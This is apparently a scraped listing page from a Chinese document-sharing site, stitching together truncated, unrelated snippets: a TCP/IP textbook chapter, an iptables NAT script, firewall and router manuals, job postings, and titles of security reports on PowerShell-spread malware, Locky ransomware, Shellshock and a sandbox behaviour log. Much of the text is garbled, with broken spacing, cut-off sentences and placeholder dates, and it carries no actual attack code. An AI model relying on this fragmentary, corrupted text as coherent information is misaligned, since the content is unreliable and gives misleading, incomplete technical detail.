Chapter # 第三章 TCP/IP 协议栈 本章目标 通过本章的学习, 您应该掌握以下内容 : 掌握 TCP/IP 分层模型 掌握 IP 协议原理 理解 OSI 和 TCP/IP 模型的区别和联系 TCP/IP 介绍 主机 主机 Internet TCP/IP 早期的协议族 全球范围 TCP/IP 协议栈 7 6 5 4 3 应用层表示层会话层传输层网络层 应用层 主机到主机层 Internet 层 2 1 数据链路层

More information

MASQUERADE # iptables -t nat -A POSTROUTING -s / o eth0 -j # sysctl net.ipv4.ip_forward=1 # iptables -P FORWARD DROP #

MASQUERADE # iptables -t nat -A POSTROUTING -s / o eth0 -j # sysctl net.ipv4.ip_forward=1 # iptables -P FORWARD DROP # iptables 默认安全规则脚本 一 #nat 路由器 ( 一 ) 允许路由 # iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT ( 二 ) DNAT 与端口转发 1 启用 DNAT 转发 # iptables -t nat -A PREROUTING -p tcp -d 192.168.102.37 dprot 422 -j DNAT to-destination

More information

XXXXXXXX http://cdls.nstl.gov.cn 2 26

XXXXXXXX http://cdls.nstl.gov.cn 2 26 [ ] [ ] 2003-7-18 1 26 XXXXXXXX http://cdls.nstl.gov.cn 2 26 (2003-7-18) 1...5 1.1...5 1.2...5 1.3...5 2...6 2.1...6 2.2...6 2.3...6 3...7 3.1...7 3.1.1...7 3.1.2...7 3.1.2.1...7 3.1.2.1.1...8 3.1.2.1.2...10

More information

Symantec™ Sygate Enterprise Protection 防护代理安装使用指南

Symantec™ Sygate Enterprise Protection 防护代理安装使用指南 Symantec Sygate Enterprise Protection 防 护 代 理 安 装 使 用 指 南 5.1 版 版 权 信 息 Copyright 2005 Symantec Corporation. 2005 年 Symantec Corporation 版 权 所 有 All rights reserved. 保 留 所 有 权 利 Symantec Symantec 徽 标 Sygate

More information

WebSphere Studio Application Developer IBM Portal Toolkit... 2/21 1. WebSphere Portal Portal WebSphere Application Server stopserver.bat -configfile..

WebSphere Studio Application Developer IBM Portal Toolkit... 2/21 1. WebSphere Portal Portal WebSphere Application Server stopserver.bat -configfile.. WebSphere Studio Application Developer IBM Portal Toolkit... 1/21 WebSphere Studio Application Developer IBM Portal Toolkit Portlet Doug Phillips (dougep@us.ibm.com),, IBM Developer Technical Support Center

More information

多起利用PowerShell传播

多起利用PowerShell传播 多起利用 POWERSHELL 传播 恶意代码的事件分析 安天安全研究与应急处理中心 (Antiy CERT) 报告初稿完成时间 :2016 年 03 月 16 日 13 时 21 分 首次发布时间 :YYYY 年 MM 月 DD 日 hh 时 mm 分 本版本更新时间 :2016 年 03 月 18 日 14 时 33 分 目录 1 概述... 1 2 利用宏病毒执行 POWERSHELL 进行传播恶意代码...

More information

.. 3 N

.. 3 N 1 .. 3 N9.. 4 5.. 6 7.. 8 20.. 21 23.. 24.. 25 26.. 27.. 28.. 29 2 (Cyber Café) Linux (LAN) Linux Public Home 3 K12LTSP K12LTSPFedora Core 4 (Linux)LTSP Linux (command line interface) (Graphical User Interface,

More information

四、實務實習課程之實習工作日誌(請貼上掃描檔)

四、實務實習課程之實習工作日誌(請貼上掃描檔) 四 實 務 實 習 課 程 之 實 習 工 作 日 誌 ( 請 貼 上 掃 描 檔 ) 教 育 部 補 助 大 學 校 院 開 設 海 洋 主 題 導 向 專 業 課 程 計 畫 實 務 實 習 課 程 修 課 學 生 工 作 日 誌 表 ( 一 學 生 一 表 ) 課 程 名 稱 : 景 觀 規 劃 ( 海 洋 休 閒 ) 實 習 地 點 : 原 本 山 景 觀 有 限 公 司 時 間 工 作 說

More information

掘 金 安 全 数 据 腾 讯 安 全 数 据 运 营 实 践 江 虎 (xti9er) 2014.11

掘 金 安 全 数 据 腾 讯 安 全 数 据 运 营 实 践 江 虎 (xti9er) 2014.11 掘 金 安 全 数 据 腾 讯 安 全 数 据 运 营 实 践 江 虎 (xti9er) 2014.11 Who am i 江 虎 xti9er 10 多 年 安 全 研 究 与 从 业 经 验 10 年 加 入 腾 讯 入 侵 检 测 体 系 建 设 应 急 响 应 安 全 培 训 入 侵 对 抗 团 队 掘 金 安 全 数 据 安 全 工 作 的 困 境 历 史 案 例 的 启 示 榨 取 数

More information

飞鱼星多WAN防火墙路由器用户手册

飞鱼星多WAN防火墙路由器用户手册 WAN VER: 20110218 Copyright 2002-2011 VOLANS WAN VR4600 VR4900 VR7200 VR7500 VR7600 1.1 1.2 IP 1.3 2.1 2.2 2.2.1 2.2.2 3.1 3.2 3.2.1 3.2.2 3.2.3 4.1 4.2 4.2.1 4.2.2 4.2.3 4.2.4 4.2.5 4.2.6 4.3 4.3.1 4.3.2

More information

自由軟體教學平台

自由軟體教學平台 NCHC Opensource task force DRBL c00hkl00@nchc.gov.tw, steven@nchc.gov.tw National Center for High-Performance Computing http://www.nchc.gov.tw Dec, 2002 1 Outline 1. 2. DRBL 3. 4. Service DHCP, TFTP, NFS,

More information

Junos Pulse Mobile Security R1 2012, Juniper Networks, Inc.

Junos Pulse Mobile Security R1 2012, Juniper Networks, Inc. Junos Pulse Mobile Security 4.0 2012 6 R1 2012, Juniper Networks, Inc. Junos Pulse Mobile Security Juniper Networks, Inc. 1194 North Mathilda Avenue Sunnyvale, California 94089 408-745-2000 www.juniper.net

More information

untitled

untitled 01 1-1 PHP 1-2 PHP 1-3 MySQL 1-4 1-5 http://w3techs.com/technologies/history_overview/programming_language w3techs.com (Server-side) 2012 7 77.8% PHP PHP PHP PHP 1-1 PHP PHP HTML Script Windows ASP(Active

More information

ebook35-2

ebook35-2 2 2.1 Linux login Login: < > Password: < > Linux r o o t l o g o u t 2.2 Linux X Window Linux Linux Bourne ( b s h ) C ( c s h ) Korn ( k s h ) Bourne Steven Bourne UNIX Bourne bash Bourne C Bill Joy Bourne

More information

标题

标题 . 4 2013 年 湖 南 省 财 政 厅 电 子 政 务 发 展 形 势 分 析 及 2014 年 发 展 展 望 湖 南 省 财 政 厅 2013 年, 省 财 政 厅 高 度 重 视 电 子 政 务 工 作, 将 电 子 政 务 作 为 优 化 工 作 流 程 提 高 工 作 效 率 提 升 服 务 水 平 建 设 透 明 廉 洁 财 政 的 重 要 途 径, 信 息 化 水 平 不 断 提

More information

一、

一、 网 上 交 易 客 户 端 操 作 文 档 证 券 2014 年 免 责 申 明 因 客 户 端 软 件 升 级, 对 应 帮 助 文 件 中 的 图 片 及 文 字 可 能 存 在 未 同 步 更 新 的 情 况, 由 此 产 生 的 损 失 我 们 将 不 负 任 何 责 任, 请 大 家 以 最 新 版 本 的 客 户 端 软 件 为 准 索 引 一 委 托 功 能 区 说 明...1 二 委

More information

宁夏专业技术人员服务平台

宁夏专业技术人员服务平台 宁 夏 专 业 技 术 人 员 服 务 平 台 职 称 申 报 系 统 版 本 号 :1.0 ( 版 本 处 于 变 动 中, 请 您 随 时 下 载 新 版 ) 使 用 说 明 书 2014 年 3 月 4 日 目 录 一 使 用 要 求... 1 二 进 入 系 统... 2 三 用 户 注 册... 4 四 完 善 个 人 基 本 信 息... 6 五 职 称 申 报... 8 六 打 印 确

More information

VIDEOJET connect 7000 VJC-7000-90 zh- CHS Operation Manual VIDEOJET connect 7000 zh-chs 3 目 录 1 浏 览 器 连 接 7 1.1 系 统 要 求 7 1.2 建 立 连 接 7 1.2.1 摄 像 机 中 的 密 码 保 护 7 1.3 受 保 护 的 网 络 7 2 系 统 概 述 8 2.1 实 况

More information

(UTM???U_935_938_955_958_959 V2.1.9.1)

(UTM???U_935_938_955_958_959 V2.1.9.1) 192.16 www.sharetech.com.tw UTM 多 功 能 防 火 牆 管 理 者 手 冊 V 2.1.9.1 目 錄 第 一 章 安 裝 與 訊 息... 7 1-1 建 議 的 安 裝 設 定 圖... 8 1-2 軟 體 安 裝 設 定... 9 1-3 首 頁 訊 息... 14 1-4 型 號 與 功 能 對 照 表... 17 第 二 章 系 統 設 定... 19 2-1

More information

自由軟體教學平台

自由軟體教學平台 NCHC Opensource task force DRBL steven@nchc.gov.tw, c00hkl00@nchc.gov.tw National Center for High-Performance Computing http://www.nchc.gov.tw Jan, 2003 1 2003/1/28 ( ) 09:00-10:30 10:40-12:00 Linux 13:00-14:30

More information

ebook65-20

ebook65-20 2 0 H T T P C G I We b C G I We b H T M L C G I H T M L C G I 20.1 HTTP 17 We b N e t s c a p e Internet Explorer We b A p a c h e I I S C G I H T T P HTTP 1.0 HTTP 1.1 I n t e r n e t I n t e r n e t

More information

营 销 策 划 岗 部 门 招 聘 职 位 招 聘 人 数 岗 位 职 责 基 本 要 求 岗 位 任 职 要 求 6 参 与 项 目 产 品 研 究 客 户 需 求 研 究 竞 争 环 境 研 究 价 格 研 究 等 项 目 市 场 研 究 ; 7 公 司 经 纪 业 务 的 品 牌 管 理, 对

营 销 策 划 岗 部 门 招 聘 职 位 招 聘 人 数 岗 位 职 责 基 本 要 求 岗 位 任 职 要 求 6 参 与 项 目 产 品 研 究 客 户 需 求 研 究 竞 争 环 境 研 究 价 格 研 究 等 项 目 市 场 研 究 ; 7 公 司 经 纪 业 务 的 品 牌 管 理, 对 202 年 国 开 证 券 有 限 责 任 公 司 总 部 招 聘 岗 位 部 门 招 聘 职 位 招 聘 人 数 岗 位 职 责 基 本 要 求 岗 位 任 职 要 求 组 织 策 划 投 资 顾 问 服 务 方 案 及 实 施 ; 中 国 证 券 业 协 会 注 册 证 券 投 资 顾 问 ; 投 顾 管 理 岗 2 组 织 策 划 投 资 顾 问 资 讯 产 品 设 计 方 案 及 实 施 ;

More information

Microsoft Word - PS2_linux_guide_cn.doc

Microsoft Word - PS2_linux_guide_cn.doc Linux For $ONY PlayStatioin2 Unofficall General Guide Language: Simplified Chinese First Write By Beter Hans v0.1 Mail: hansb@citiz.net Version: 0.1 本 人 是 菜 鸟 + 小 白 欢 迎 指 正 错 误 之 处, 如 果 您 有 其 他 使 用 心 得

More information

目 標 評 核 項 目 中 央 研 究 院 102 年 總 辦 事 處 計 算 中 心 績 效 評 比 報 告 執 行 績 效 ( 含 設 定 目 標 之 複 雜 度 及 挑 戰 性 目 標 達 成 度 實 際 成 效 ) 共 同 性 評 核 項 目 一 行 政 效 能 ( 一 ) 建 置 本 院

目 標 評 核 項 目 中 央 研 究 院 102 年 總 辦 事 處 計 算 中 心 績 效 評 比 報 告 執 行 績 效 ( 含 設 定 目 標 之 複 雜 度 及 挑 戰 性 目 標 達 成 度 實 際 成 效 ) 共 同 性 評 核 項 目 一 行 政 效 能 ( 一 ) 建 置 本 院 中 央 研 究 院 102 年 總 辦 事 處 計 算 中 心 績 效 評 比 報 告 目 錄 壹 共 同 性 評 核 項 目... 1 一 行 政 效 能... 1 ( 一 ) 建 置 本 院 科 研 採 購 平 台... 1 ( 二 ) 規 劃 全 院 網 路 電 話 基 礎 建 設... 2 ( 三 ) 通 報 與 追 蹤 處 理 院 內 資 訊 安 全 事 項... 3 ( 四 ) 一 般

More information

<4D6963726F736F667420576F7264202D20383439342D352DBED6D3F2CDF8D7E9BDA8D3EBB9DCC0EDCFEEC4BFBDCCB3CCD5FDCEC42E646F63>

<4D6963726F736F667420576F7264202D20383439342D352DBED6D3F2CDF8D7E9BDA8D3EBB9DCC0EDCFEEC4BFBDCCB3CCD5FDCEC42E646F63> 第 4 单 元 搭 建 自 己 的 Web 站 点 本 单 元 通 过 学 习 架 构 Web 服 务 器, 实 现 Web 服 务, 管 理 Web 站 点, 了 解 Web 站 点 服 务 器 的 架 构 个 人 空 间 和 虚 拟 主 机 的 概 念, 掌 握 IIS 组 件 的 安 装 Web 站 点 的 创 建 管 理 站 点 属 性 选 项 卡 的 配 置 管 理 等 知 识,Web 网

More information

首例具有中文提示的比特币勒索软件”locky“

首例具有中文提示的比特币勒索软件”locky“ 首例具有中文提示的比特币勒 索软件 locky 安天安全研究与应急处理中心 (Antiy CERT) 报告初稿完成时间 :2016 年 02 月 18 日 09 时 26 分 首次公开发布时间 :2016 年 02 月 19 日 14 时 04 分 本版本更新时间 :2016 年 02 月 19 日 14 时 04 分 目录 1 概述... 3 2 样本分析... 3 2.1 样本标签... 3 2.2

More information

ebook177-1

ebook177-1 1 1968 A R PA N E T A R PA N E T 1 9 7 3 Ly n c h R o s e Internet system Handbook ( 1993 ) David Croker R F C Request for Comment 1969 R F C R F C M O 1969 1974 A R PA N E T 1977 I E N T C P / I P 1986

More information

untitled

untitled IP POWER 9258SX IP POWER 9258SX 說 : V1.38 : 2006. 11-1 - VER. X.X, FCC CE 1.. 2. 9258 3. 9258-2 - 1....4... 9258... 2....5...... 3....6 4....8...... 5.... 10 PC... PC... 6.... 13 7. IE... 14 9258... 9258...

More information

BYOD Http Redirect convergence Client (1) 2008R2 NLB( ) (2) NLB Unicast mode switch flooding (arp ) NLB DNS Redirect 1. Round-Robin DNS DNS IP/DNS Cli

BYOD Http Redirect convergence Client (1) 2008R2 NLB( ) (2) NLB Unicast mode switch flooding (arp ) NLB DNS Redirect 1. Round-Robin DNS DNS IP/DNS Cli BYOD 204 2015 GoogleHicloud (Load Balance) Server Load Balance Link Load Balance Server Redirect 1. URL Redirect redirector URL redirect Real Server Client HTTP Real Server Web Client 2 (1) URL Redirect

More information

Web

Web Email: tian@dr.com http://www.digiark.com/tian Web 1. 2. 3. 4. 5. 6. Internet Internet (Hacker) Internet web IP 1 Internet UNIX Windows VLAN Internet IP 2 Internet FTP TELNET PING IP 8 telnet FTP RLOGIN

More information

NetST 2300系列防火墙产品白皮书

NetST 2300系列防火墙产品白皮书 2000 (NetST 2000 ) ... 3... 4 NetST 2000... 5 1...5 2...5 3...6 4...9 5...9 6...9 7...10 7.1...10 7.2...10 7.3...11 7.4...11 7.5...13 7.6...13 7.7 VPN...14 7.8...14 7.9...15 7.10...17 7.11 IP...17 7.12...18

More information

D-link用户手册.doc

D-link用户手册.doc 声 明 Copyright 1986-2013 版 权 所 有, 保 留 一 切 权 利 非 经 本 公 司 书 面 许 可, 任 何 单 位 和 个 人 不 得 擅 自 摘 抄 复 制 本 书 内 容 的 部 分 或 全 部, 并 不 得 以 任 何 形 式 传 播 由 于 产 品 版 本 升 级 或 其 它 原 因, 本 手 册 内 容 会 不 定 期 进 行 更 新, 为 获 得 最 新 版

More information

專業式報告

專業式報告 IP POWER 9258 1U IP POWER 9258IU 說 : V1.38 : 2006. 08-1 - VER. X.X, FCC CE 1. IP POWER 9258. 2. 9258 3. 9258-2 - 1....4... 9258... 2....5...... 3....6 4....8...... 5....9... PC WINDOWS... 6.... 11 7. IE...

More information

魔鼬”木马DDoS事件分析

魔鼬”木马DDoS事件分析 安天 - 安全研究与应急处理中心 报告初稿完成时间 :2017 年 08 月 02 日 01 时 34 分 首次发布时间 :2017 年 08 月 02 日 02 时 26 分 本版本更新时间 :2017 年 08 月 02 日 16 时 30 分 魔鼬 木马 DDoS 事件分析 目录 1 概述... 1 2 受攻击目标... 1 3 事件样本分析... 2 4 相关事件关联... 5 5 总结...

More information

C3_ppt.PDF

C3_ppt.PDF C03-101 1 , 2 (Packet-filtering Firewall) (stateful Inspection Firewall) (Proxy) (Circuit Level gateway) (application-level gateway) (Hybrid Firewall) 2 IP TCP 10.0.0.x TCP Any High Any 80 80 10.0.0.x

More information

11N 无线宽带路由器

11N 无线宽带路由器 http://www.tenda.com.cn 1... 1 1.1... 1 1.2... 1 2... 3 2.1... 3 2.2... 3 2.3... 5 2.4... 6 2.5... 7 2.6... 9 2.6.1 无线基本设置... 9 2.6.2 无线加密设置... 9 2.7... 10 3... 18 3.1... 18 3.2... 19 3.2.1 ADSL 拨号上网设置...

More information

PTS7_Manual.PDF

PTS7_Manual.PDF User Manual Soliton Technologies CO., LTD www.soliton.com.tw - PCI V2.2. - PCI 32-bit / 33MHz * 2 - Zero Skew CLK Signal Generator. - (each Slot). -. - PCI. - Hot-Swap - DOS, Windows 98/2000/XP, Linux

More information

TH-1003_MN.pptx

TH-1003_MN.pptx 1 2 3 (Domain Name System,DNS) IP ;, u (Sponsored)1 4 u (Generic) 4 u (Genericrestricted)3 u 291 u 11 u.arpa; 5 1 0.9 0.8 0.7 0.6 0.5 0.4 0.3 0.2 0.1 0 95.43% 1.99% 1.52% 0.47% 0.23% 0.23% 0.12% 0.01%

More information

epub 61-2

epub 61-2 2 Web Dreamweaver UltraDev Dreamweaver 3 We b We b We Dreamweaver UltraDev We b Dreamweaver UltraDev We b We b 2.1 Web We b We b D r e a m w e a v e r J a v a S c r i p t We b We b 2.1.1 Web We b C C +

More information

( ) ( ) 2011 ( ) 88 / 131

( ) ( ) 2011 ( ) 88 / 131 ( ) " " 2011 8 29 2011 9 1 ( ) 2011 12 29 2012 3 15 87 / 131 ( ) 2011 2011 2010 3000 ( ) 2011 ( ) 88 / 131 4 21 ( ) 11 23 2013 6 2014 2015 4 6 ( ) 2011 2 10 ( ) 2011 9 89 / 131 ( ) 11 18 CNCERT CNCERT

More information

本文由筱驀釹贡献

本文由筱驀釹贡献 本 文 由 筱 驀 釹 贡 献 ppt 文 档 可 能 在 WAP 端 浏 览 体 验 不 佳 建 议 您 优 先 选 择 TXT, 或 下 载 源 文 件 到 本 机 查 看 Linux 操 作 系 统 Linux 操 作 系 统 第 一 部 分 介 绍 与 安 装 Linux 的 由 来 : Linux 的 由 来 : 的 由 来 Linus Torvalds 1.Linux 的 版 本 1.Linux

More information

2

2 2011 Ver. 1.2.0 2 3 P2P Tunnel BotNet Zero-Day 4 port port HTTP (TCP/80), HTTPS(TCP/443) SSL SSH IPSec Ex:TOR Protocol Obfuscation( ) P2P Protocol Obfuscation P2P 5 P2P 6 P2P P2P P2P 6 7 P2P Tunnel BotNet

More information

AL-MX200 Series

AL-MX200 Series PostScript Level3 Compatible NPD4760-00 TC Seiko Epson Corporation Seiko Epson Corporation ( ) Seiko Epson Corporation Seiko Epson Corporation Epson Seiko Epson Corporation Apple Bonjour ColorSync Macintosh

More information

第 11 章 互聯網技術 11.1 互聯 網 和 萬 維 網 的 發 展 歷 史 A. 互聯網的發展 互聯網是由 ARPANET 開 始發展的 1969 年 美國國防部高級研究計劃署 (ARPA) 把部分軍事研究所和大 的電腦連接起來 建造了㆒個實驗性的電腦網絡 稱為 ARPANET 並 列 的功能

第 11 章 互聯網技術 11.1 互聯 網 和 萬 維 網 的 發 展 歷 史 A. 互聯網的發展 互聯網是由 ARPANET 開 始發展的 1969 年 美國國防部高級研究計劃署 (ARPA) 把部分軍事研究所和大 的電腦連接起來 建造了㆒個實驗性的電腦網絡 稱為 ARPANET 並 列 的功能 互 聯 網 技 術 在 完 成 這 章 後, 你 將 能 夠 描 述 互 聯 網 的 發 展 歷 史 描 述 萬 維 網 的 發 展 歷 史 了 解 連 接 互 聯 網 的 基 本 概 念 能 夠 連 接 到 互 聯 網 知 道 互 聯 網 如 何 運 作 互 聯 網 是 全 球 網 絡 的 集 合 互 聯 網 (Internet) 是 ㆒ 個 集 合 全 球 許 多 網 絡 ㆒ 起 的 大 型 網

More information

Kubenetes 系列列公开课 2 每周四晚 8 点档 1. Kubernetes 初探 2. 上 手 Kubernetes 3. Kubernetes 的资源调度 4. Kubernetes 的运 行行时 5. Kubernetes 的 网络管理理 6. Kubernetes 的存储管理理 7.

Kubenetes 系列列公开课 2 每周四晚 8 点档 1. Kubernetes 初探 2. 上 手 Kubernetes 3. Kubernetes 的资源调度 4. Kubernetes 的运 行行时 5. Kubernetes 的 网络管理理 6. Kubernetes 的存储管理理 7. Kubernetes 包管理理 工具 Helm 蔺礼强 Kubenetes 系列列公开课 2 每周四晚 8 点档 1. Kubernetes 初探 2. 上 手 Kubernetes 3. Kubernetes 的资源调度 4. Kubernetes 的运 行行时 5. Kubernetes 的 网络管理理 6. Kubernetes 的存储管理理 7. Kubernetes

More information

untitled

untitled IP Video 9100B-RS IP VIDEO 9100(B) 說 IP Video 9100B-RS 說 : 2.39-RS : 2007.1-1 - FCC CE 1. IP Video 9100B-RS. 2. IP Video 9100B-RS. 3. 4. 9100B-RS 5. 9100B-RS - 2 - IP VIDEO 9100(B) 說 1.... 4... 2.... 5

More information

1

1 010-6298822 010-82899313 http://www.th-dascom.com.cn 9 5 1 1....3 1.1...4 1.1.1...4 1.1.2...5 1.2...6 1.3...7 1.3.1...7 1.3.2...8 1.3.3...8 1.3.4...8 1.3.5...9 1.3.6...9 2....9 2.1...9 2.2...10 2.2.1...10

More information

PL600 IPPBX 用户手册_V2.0_.doc

PL600 IPPBX 用户手册_V2.0_.doc VoIP 网 络 交 换 机 PL-600 IPPBX 用 户 手 册 深 圳 普 联 讯 电 子 科 技 有 限 公 司 版 权 所 有 2009 深 圳 市 普 联 讯 电 子 科 技 有 限 公 司 第 1 共 1 目 录 1. 前 言...3 2. 安 装 前 准 备...3 3. 硬 件 安 装...4 4. 登 陆 及 一 般 操 作 介 绍...4 5. 基 本 配 置...6 6.

More information

專業式報告

專業式報告 IP POWER 9258 IP POWER 9258 說 : V1.38 : 2006. 08-1 - VER. X.X, FCC CE 1. IP POWER 9258. 2. 9258 3. 9258-2 - 1....4... 9258... 2....5...... 3....6 4....7...... 5....8... PC / SERVER.. 6. IE... 11 9258...

More information

Microsoft Word - 在VMWare-5.5+RedHat-9下建立本机QTopia-2.1.1虚拟平台a.doc

Microsoft Word - 在VMWare-5.5+RedHat-9下建立本机QTopia-2.1.1虚拟平台a.doc 在 VMWare-5.5+RedHat-9 下建立 本机 QTopia-2.1.1 虚拟平台 张大海 2008-5-9 一 资源下载 1. 需要以下安装包 : tmake-1.13.tar.gz qtopia-free-source-2.1.1.tar.gz qt-embedded-2.3.10-free.tar.gz qt-x11-2.3.2.tar.gz qt-x11-free-3.3.4.tar.gz

More information

利用路由器传播的DYREZA家族变种分析

利用路由器传播的DYREZA家族变种分析 安天安全研究与应急处理中心 首次发布时间 :2015 年 09 月 01 日 17 时 00 分 本版本更新时间 :2015 年 09 月 01 日 17 时 00 分 目录 1 概述... 1 2 事件样本分析... 2 2.1 传播过程... 2 2.2 样本标签... 3 2.3 UPATRE 样本分析... 3 3 DYREZA 家族变种分析... 6 3.1 样本标签... 6 3.2 DYREZA

More information

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco

Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco Windows RTEMS 1 Danilliu MMI TCP/IP 80486 QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos ecos Email www.rtems.com RTEMS ecos RTEMS RTEMS Windows

More information

Microsoft Word - linux命令及建议.doc

Microsoft Word - linux命令及建议.doc Linux 操 作 系 统 命 令 集 1 基 本 命 令 查 看 系 统 信 息 : uname -a 修 改 密 码 : passwd 退 出 : logout(exit) 获 取 帮 助 : man commands 2 文 件 和 目 录 命 令 显 示 当 前 工 作 目 录 : pwd 改 变 所 在 目 录 : cd cd - 切 换 到 上 一 次 使 用 的 目 录 cd 切 换

More information

<B1B1BEA9B9E2BBB7D0C2CDF8BFC6BCBCB9C9B7DDD3D0CFDEB9ABCBBEB4B43F3F12FB6CB293>

<B1B1BEA9B9E2BBB7D0C2CDF8BFC6BCBCB9C9B7DDD3D0CFDEB9ABCBBEB4B43F3F12FB6CB293> 本 次 股 票 发 行 后 拟 在 创 业 板 市 场 上 市, 该 市 场 具 有 较 高 的 投 资 风 险 创 业 板 公 司 具 有 业 绩 不 稳 定 经 营 风 险 高 退 市 风 险 大 等 特 点, 投 资 者 面 临 较 大 的 市 场 风 险 投 资 者 应 充 分 了 解 创 业 板 市 场 的 投 资 风 险 及 本 公 司 所 披 露 的 风 险 因 素, 审 慎 作 出

More information

SEC-220

SEC-220 Session CERT/CC 60000 50000 40000 52,658 30000 26,829 20000 10000 0 2,412 1995 1999 2000 2001 Q1, 2002 Source: http://www.cert.org/stats/ CERT/CC 3000 2500 2000 2,437 1500 1000 500 0 171 1,065 1995

More information

Trend Micro

Trend Micro 資 訊 安 全 - 惡 意 軟 體 的 深 度 防 禦 胡 瑞 宸 大 綱 資 訊 安 全 概 念 現 在 流 行 什 麼? 病 毒 清 除 與 分 析 建 議 程 序 正 確 有 效 的 防 護 觀 念 Free Tool ( 免 費 工 具 ) Cloud technology ( 雲 端 技 術 ) 惡 意 程 式 威 脅 管 理 資 訊 安 全 概 念 資 訊 安 全 概 念 沒 有 任 何

More information

前 言 首 先, 感 謝 你 購 買 了 Linux LPIC Level I + Novell CLA 11 這 本 書, 這 本 書 是 全 球 第 一 本 以 Novell SUSE Linux Enterprise Server 來 分 析 兩 大 Linux 認 證 的 自 學 手 冊 目 前 訪 間 充 斥 著 許 多 Linux 作 業 系 統 的 教 學 手 冊 考 照 的 書 籍,

More information

快 速 入 门 (Linux) 概 述 文 档 目 的 本 文 档 介 绍 了 如 何 快 速 创 建 Linux 系 统 实 例 远 程 连 接 实 例 部 署 环 境 等 旨 在 引 导 您 一 站 式 完 成 实 例 的 创 建 登 录 和 快 速 环 境 部 署 云 服 务 器 ECS 实

快 速 入 门 (Linux) 概 述 文 档 目 的 本 文 档 介 绍 了 如 何 快 速 创 建 Linux 系 统 实 例 远 程 连 接 实 例 部 署 环 境 等 旨 在 引 导 您 一 站 式 完 成 实 例 的 创 建 登 录 和 快 速 环 境 部 署 云 服 务 器 ECS 实 云 服 务 器 ECS 快 速 入 门 (Linux) 快 速 入 门 (Linux) 概 述 文 档 目 的 本 文 档 介 绍 了 如 何 快 速 创 建 Linux 系 统 实 例 远 程 连 接 实 例 部 署 环 境 等 旨 在 引 导 您 一 站 式 完 成 实 例 的 创 建 登 录 和 快 速 环 境 部 署 云 服 务 器 ECS 实 例, 有 时 候 也 被 称 为 阿 里 云

More information

温州市政府分散采购

温州市政府分散采购 温 州 市 政 府 分 散 采 购 招 标 文 件 招 标 编 号 :F - G B 2 0 1 6 0 3 1 4 0 0 4 7 招 标 项 目 : 温 州 市 人 民 政 府 办 公 室 政 务 云 平 台 ( 重 ) 招 标 方 式 : 公 开 招 标 招 标 人 : 温 州 市 人 民 政 府 办 公 室 招 标 代 理 : 二 〇 一 六 年 三 月 目 录 投 标 保 证 金 办 理

More information

KL DSC DEMO 使用说明

KL DSC DEMO 使用说明 :0755-82556825 83239613 : (0755)83239613 : http://www.kingbirdnet.com EMAIL Good989@163.com 1 1 KB3000 DTU... 3 1.1... 3 1.2... 3 1.3... 3 1.4... 3 2... 4 2.1 GSM/GPRS... 4 2.2... 4 2.3... 5 2.4... 6 2.5...

More information

ebook70-13

ebook70-13 1 3 I S P O p e n L i n u x Point to Point Protocol P P P I S P L i n u x 10 L i n u x World Wide We b 13.1 We b f t p ( ) f t p (File Transfer Protocol F T P ) F T P g e t p u t 13. 1. 1 F T P f t p n

More information

1 产 品 简 介... - 1-1.1 特 性... - 1-1.2 包 装... - 1-1.3 产 品 外 观... - 2-1.4 电 脑 系 统 要 求... - 3-1.5 硬 件 安 装... - 3-1.6 软 件 安 装... - 4-2 软 件 操 作... - 6-2.1 IP

1 产 品 简 介... - 1-1.1 特 性... - 1-1.2 包 装... - 1-1.3 产 品 外 观... - 2-1.4 电 脑 系 统 要 求... - 3-1.5 硬 件 安 装... - 3-1.6 软 件 安 装... - 4-2 软 件 操 作... - 6-2.1 IP 无 线 / 有 线 网 络 摄 像 机 使 用 说 明 书 黑 色 白 色 深 圳 市 富 泓 电 子 有 限 公 司 电 话 : +86-755-26509025 传 真 : +86-755-26509229 1 产 品 简 介... - 1-1.1 特 性... - 1-1.2 包 装... - 1-1.3 产 品 外 观... - 2-1.4 电 脑 系 统 要 求... - 3-1.5 硬

More information

INTRODUCTION 1. 简 介 2. 关 于 这 本 指 南 2

INTRODUCTION 1. 简 介 2. 关 于 这 本 指 南 2 CIRCUMVENTION TOOLS Published : 2011-10-26 License : None 1 INTRODUCTION 1. 简 介 2. 关 于 这 本 指 南 2 1. 简 介 1948 年 12 月 10 日, 世 界 人 权 宣 言 的 通 过 开 启 了 一 个 新 的 时 代 黎 巴 嫩 学 者 查 理 斯 哈 比 卜 马 利 克 向 参 会 代 表 做 了 如

More information

“破壳”漏洞(CVE )综合分析_V1.53

“破壳”漏洞(CVE )综合分析_V1.53 安天实验室安全研究与应急处理中心 ( 安天 CERT) 破壳 漏洞系列分析之一 首次发布时间 :2014 年 9 月 25 日 10 时 本版本更新时间 :2014 年 10 月 13 日 11 时 20 分 目录 1 威胁卡片... 2 2 概述... 2 3 已知事件发布 / 披露情况... 3 4 漏洞的影响范围... 4 5 漏洞原理... 4 6 漏洞验证方法... 5 7 漏洞检测方法...

More information

计算机网络实验说明

计算机网络实验说明 计算机网络实验说明 龚旭东 电三楼 420 lzgxd@mailustceducn 2011 年 11 月 1 日 龚旭东 (TA) 计算机网络实验说明 2011 年 11 月 1 日 1 / 20 Outline 1 实验系统介绍 实验环境实验流程 2 实验内容编程实验交互实验观察实验 3 一些控制台命令 4 实验报告说明 龚旭东 (TA) 计算机网络实验说明 2011 年 11 月 1 日 2

More information

静态分析 投放文件 行为分析 互斥量 (Mutexes) 执行的命令 创建的服务 启动的服务 进程 cmd.exe PID: 2520, 上一级进程 PID: 2556 cmd.exe PID: 2604, 上一级进程 PID: 2520 访问的文件 C:\Users\test\AppData\Lo

